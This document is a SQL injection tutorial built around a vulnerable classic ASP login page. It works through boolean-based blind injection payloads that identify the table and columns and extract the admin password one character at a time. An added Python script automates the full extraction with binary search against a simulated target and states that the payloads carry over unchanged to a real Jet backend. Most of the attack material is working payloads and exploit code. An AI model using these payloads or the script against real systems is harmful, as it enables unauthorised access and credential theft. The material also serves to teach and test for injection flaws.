Manual SQL injection testing

login.html

<!-- Form restored from the stripped page; field names follow Request("name") / Request("pass") in login.asp,
     and method="get" matches the query-string URLs used below. -->
<html>
<head><title>Please log in</title></head>
<body>
<h3>Please enter your password:</h3>
<form action="login.asp" method="get">
  User:     <input type="text" name="name"><br>
  Password: <input type="password" name="pass"><br>
  <input type="submit" value="Login">
</form>
</body>
</html>

login.asp

<%
inname=Request("name")
inpass=Request("pass")

set conn=server.createobject("ADODB.CONNECTION")
conn.open "Provider=microsoft.jet.oledb.4.0; Data Source=" & server.mappath("/data.db")

' The name parameter is concatenated straight into the query, so a quote in it
' ends the string literal and everything after it is parsed as SQL, e.g.
' name=admin' and 1=1 and 'a'='a  yields
'   SELECT * FROM data Where uname='admin' and 1=1 and 'a'='a'
sqlstr="SELECT * FROM data Where uname='" & inname & "'"
Set rs=conn.Execute(sqlstr)

' If the query returned no rows, rs("pass") raises a runtime error instead of
' printing "Login failed!" -- this difference is the oracle used below.
if inpass=rs("pass") then
  response.write("<h3>Login succeeded!</h3>")
  response.write("User ID: " & rs("uid") & "<br>")
else
  response.write("Login failed!")
end if
Set rs=Nothing
conn.close
%>

Parameters: http://192.168.10.1/login.asp?pass=test&name=test

Original SQL statement: SELECT * FROM data Where uname='test'

1. Constructing a SQL statement that executes

http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
This is equivalent to executing SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
The quote after test closes the string literal, and the trailing 'a'='a (with no closing quote) absorbs the quote that login.asp appends, so the statement stays syntactically valid.
If this request behaves exactly like the plain name=test request (a "Login failed!" page rather than a script error), the database is evaluating the condition in the 1=1 slot, and we can substitute any condition we want to test. The user test must exist: if the outer uname='test' matches no row, the recordset is empty whether the injected condition is true or false, and there is nothing to observe.

2. Guessing the table name

Replace 1=1 with (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
This is equivalent to executing
SELECT * FROM data Where uname='test' and (select count(*) from data)>0 and 'a'='a'
If no table named data exists, the query fails and the page errors; if it does, the response matches the step 1 baseline.

3. Guessing the user-name column

(select count(name) from data)>0

One candidate column name per request. Note that login.asp's own query uses the column uname, so against this schema the guess name fails (Jet treats an unknown column as a missing parameter and the query errors) and (select count(uname) from data)>0 is the one that succeeds.

4. Guessing the password column

(select count(pass) from data)>0


5. Guessing the password length

//check whether the password is longer than 1 character

(Select count(*) from data where uname='admin' and len(pass)>1)>0

//check whether the password is shorter than 10 characters

(Select count(*) from data where uname='admin' and len(pass)<10)>0

Narrow the range with successive comparisons until a single length remains. The where clause uses the column name established in step 3 (uname, as in login.asp).


6. Guessing the password one character at a time

//is the 1st character a digit? (Jet compares strings lexically, so bound the range on both sides)
(Select count(*) from data where uname='admin' and mid(pass,1,1)>='0' and mid(pass,1,1)<='9')>0

//is the 1st character a letter?

(Select count(*) from data where uname='admin' and mid(pass,1,1)>='a')>0

//is the 1st character equal to c?

(Select count(*) from data where uname='admin' and mid(pass,1,1)='c')>0

Repeat with mid(pass,2,1), mid(pass,3,1), ... up to the length found in step 5. Jet's default text comparison is case-insensitive, so ='c' also matches 'C'; the equality test alone cannot tell the two apart.
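Steps 1 to 6 above are one procedure: a boolean oracle (error page vs. "Login failed!") driven by conditions in the 1=1 slot. The script below is an added example, not code from the original post, that runs the whole procedure automatically: it confirms the table and column names, finds the password length by binary search on len(pass), and recovers each character by binary search on mid(pass,i,1) followed by an equality check. To run offline it simulates login.asp with sqlite3 instead of Jet; mid() and len() are registered as user functions so the Jet-style payloads from the post are used unchanged. The data table, the user test and the admin password c4t are constructed for the demo. One difference from the real target: sqlite compares strings case-sensitively, whereas Jet's default comparison does not, so against Access the alphabet should be lowercase only.

```python
"""Boolean-based blind extraction against the login.asp pattern described above.

Added example, not code from the original post. The vulnerable page is
simulated with sqlite3 so it runs offline; mid() and len() are registered as
user functions so the Jet-style payloads from the post work unchanged.
The data table and the admin password 'c4t' are constructed for the demo.
"""
import sqlite3
import string

ALPHABET = string.digits + string.ascii_lowercase  # sorted: digits precede letters


def make_target():
    """Constructed stand-in for data.db with the columns login.asp uses."""
    conn = sqlite3.connect(":memory:")
    # Jet/Access functions the payloads rely on; SQLite lacks them natively.
    conn.create_function("mid", 3, lambda s, start, n: s[start - 1:start - 1 + n])
    conn.create_function("len", 1, len)
    conn.execute("CREATE TABLE data (uid INTEGER, uname TEXT, pass TEXT)")
    conn.executemany("INSERT INTO data VALUES (?, ?, ?)",
                     [(1, "admin", "c4t"), (2, "test", "secret")])
    return conn


def login_asp(conn, inname, inpass):
    """Mirror of login.asp: the name parameter is concatenated, never escaped.
    Returns the response an attacker would see."""
    sqlstr = "SELECT * FROM data Where uname='" + inname + "'"
    try:
        row = conn.execute(sqlstr).fetchone()
    except sqlite3.Error:
        return "error"           # malformed SQL -> ASP runtime error page
    if row is None:
        return "error"           # rs("pass") on an empty recordset also raises
    return "login ok" if inpass == row[2] else "login failed"


def oracle(conn, condition):
    """Step 1 shape: test' and <condition> and 'a'='a
    True when the page behaves like the plain name=test baseline."""
    payload = "test' and " + condition + " and 'a'='a"
    return login_asp(conn, payload, "x") != "error"


def admin_cond(expr):
    """Step 5/6 subquery shape, with uname as in login.asp's own query."""
    return "(Select count(*) from data where uname='admin' and " + expr + ")>0"


def guess_length(conn, max_len=32):
    """Step 5 by binary search on len(pass) instead of one-off comparisons."""
    if oracle(conn, admin_cond(f"len(pass)>{max_len}")):
        raise ValueError("password longer than max_len")
    lo, hi = 1, max_len
    while lo < hi:
        m = (lo + hi) // 2
        if oracle(conn, admin_cond(f"len(pass)>{m}")):
            lo = m + 1
        else:
            hi = m
    return lo


def guess_char(conn, pos, alphabet=ALPHABET):
    """Step 6: binary search with mid(pass,pos,1)>'x', then confirm with ='x'.
    Returns None if the character lies outside the alphabet."""
    lo, hi = 0, len(alphabet) - 1
    while lo < hi:
        m = (lo + hi) // 2
        if oracle(conn, admin_cond(f"mid(pass,{pos},1)>'{alphabet[m]}'")):
            lo = m + 1
        else:
            hi = m
    c = alphabet[lo]
    return c if oracle(conn, admin_cond(f"mid(pass,{pos},1)='{c}'")) else None


def extract_password(conn):
    n = guess_length(conn)
    return "".join(guess_char(conn, i) or "?" for i in range(1, n + 1))


def demo():
    conn = make_target()
    return {
        "table_data": oracle(conn, "(select count(*) from data)>0"),        # step 2
        "column_name": oracle(conn, "(select count(name) from data)>0"),    # step 3, wrong guess
        "column_uname": oracle(conn, "(select count(uname) from data)>0"),  # step 3, right guess
        "password": extract_password(conn),                                 # steps 5-6
    }


if __name__ == "__main__":
    print(demo())
```

The binary search needs about log2(36) requests per character instead of one per candidate, and the final equality check catches characters outside the alphabet (reported as ?) rather than silently returning the nearest one. Against a real Jet backend the same payload strings go in the name parameter of the URL; only the transport changes.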

